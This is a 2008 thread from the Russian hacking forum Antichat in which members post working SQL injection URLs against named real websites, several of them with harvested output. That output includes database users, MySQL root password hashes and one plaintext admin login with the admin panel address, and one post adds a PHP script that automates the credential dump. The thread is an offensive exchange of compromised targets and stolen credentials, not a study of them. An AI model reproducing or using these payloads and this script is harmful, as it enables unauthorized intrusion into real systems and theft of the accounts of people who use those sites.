ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.05.2008, 01:23
|
|
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698
Репутация:
1446
|
|
falconleader.eu
Код:
http://www.falconleader.eu/index.php?cat=1&id=2&pid=-1+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12/*
5.0.27�fiorano@dedik-192.nebula.fi�fiorano
Код:
http://www.falconleader.eu/index.php?cat=1&id=2&pid=-1+union+select+1,concat(name,0x3,passw),3,4,5,6,7,8,9,10,11,12+from+users/*
Sampsa�346a55ca940cea871ae30d7c605c0b8a
|
|
|
21.05.2008, 14:00
|
|
Познающий
Регистрация: 23.04.2008
Сообщений: 39
Провел на форуме:
198086
Репутация:
135
|
|
openworld.gov
_http://www.openworld.gov/article/print.php?id=1 and 1=1
_http://www.openworld.gov/article/print.php?id=1 and 1=2
Последний раз редактировалось КВР; 21.05.2008 в 14:02..
|
|
|
|
21.05.2008, 15:05
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
http://www.fromthetop.org/
PR:6
Код:
http://www.fromthetop.org/Programs/Performers.cfm?pid=-1+union+select+1,2,concat(user,0x3a,password),4,5,6,7+from+mysql.user/*
root:*CF57A666D82A1A6E307947399943403DD93CF490
|
|
|
|
21.05.2008, 15:17
|
|
Познающий
Регистрация: 23.04.2008
Сообщений: 39
Провел на форуме:
198086
Репутация:
135
|
|
Выводит всю базу .
PHP код:
<?
echo "<pre>\n";
@set_time_limit(0);
@ini_set("display_errors","0");
$hostname = gethostbyname('fromthetop.org');
function from($from)
{
global $hostname;
$responce = "";
$fsock = fsockopen($hostname,80,$errnum,$errstr,2);
$headers = "GET hhttp://www.fromthetop.org/Programs/Performers.cfm?pid=-1+union+select+1,2,concat(user,0x3a,password),4,5,6,7+from+$from/* HTTP/1.1\n";
$headers .= "Host: my-photo.ru\n";
$headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n";
$headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
$headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n";
$headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n";
$headers .= "Keep-Alive: 500\n";
$headers .= "Connection: close\n";
$headers .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
fwrite ($fsock,$headers);
while (!feof($fsock)) $responce .= fread($fsock,1024);
fclose ($fsock);
$patern = "#<[\s]*sqlinj[\s]*>([^<]*)<[\s]*/sqlinj[\s]*>#i";
if(preg_match($patern, $responce, $rez)) echo $rez[1]; else echo 'Something not right...';
//echo $responce;
}
from("mysql.user");
echo "</pre>";
?>
|
|
|
|
21.05.2008, 18:16
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.leuragardensfestival.com.au/page.php?id=-23+un ion+select+1,2, 3,4,5,6,7, 8,9,0/*
version :4.0.15-Max
user: leuragar@localhost
database : leuragar_db
|
|
|
|
22.05.2008, 00:04
|
|
Reservists Of Antichat - Level 6
Регистрация: 10.04.2008
Сообщений: 299
Провел на форуме:
1199829
Репутация:
405
|
|
http://www.poznay-mir.ru/tourist.php?uid=-1+union+select+1,2,3,4,version()/*
|
|
|
|
22.05.2008, 13:36
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
http://www.floraindia.com
Код:
http://www.floraindia.com/details.cfm?PID=1+or+1=(SELECT+TOP+1+cast(email+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarchar)+FROM+membermaster)--
Код:
http://www.floraindia.com/details.cfm?PID=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2Bchar(58)%2Bcast(pwd+as+nvarchar)+FROM+users)--
http://www.highwayafrica.ru.ac.za PR:5
Код:
http://www.highwayafrica.ru.ac.za/page.cfm?pID=-1+union+select+1,2,unhex(hex(concat(user,0x3a,password))),4,5+from+mysql.user/*
root:*78961DCFDA81834DF8D39AB3BDFD900D16809523
Код:
http://www.highwayafrica.ru.ac.za/page.cfm?pID=-1+union+select+1,2,unhex(hex(concat(username,0x3a,userpassword))),4,5+from+admin/*
admin:highwayafrica
Админка:
http://www.highwayafrica.ru.ac.za/admin/login.cfm
|
|
|
|
22.05.2008, 14:39
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
neeblee.com
Код:
http://www.neeblee.com/plaincart/index.php?c=39&p=-33+union+select+1,concat_ws(0x3,user_name,user_password),3,4,5+from+tbl_user/*
Последний раз редактировалось baltazar; 22.05.2008 в 14:51..
|
|
|
|
22.05.2008, 17:43
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
arcdi.com
Код:
http://www.arcdi.com/trainers.php?id=-33+union+select+1,concat(username,0x3a,password),3,4,5+FROM+users%20--
|
|
|
|
22.05.2008, 19:01
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме:
3008839
Репутация:
1502
|
|
случайно попал на сайт и заметил - может кто чёнть с ним придумает...
blind sql inject:
http://www.microstar.ru/program/products/notebook/nb/pro_nb_selling.php?UID=630%20and%201=1
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|
|
|
|
|
|
Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
|
|
|
|
Похожие темы
Линейный вид
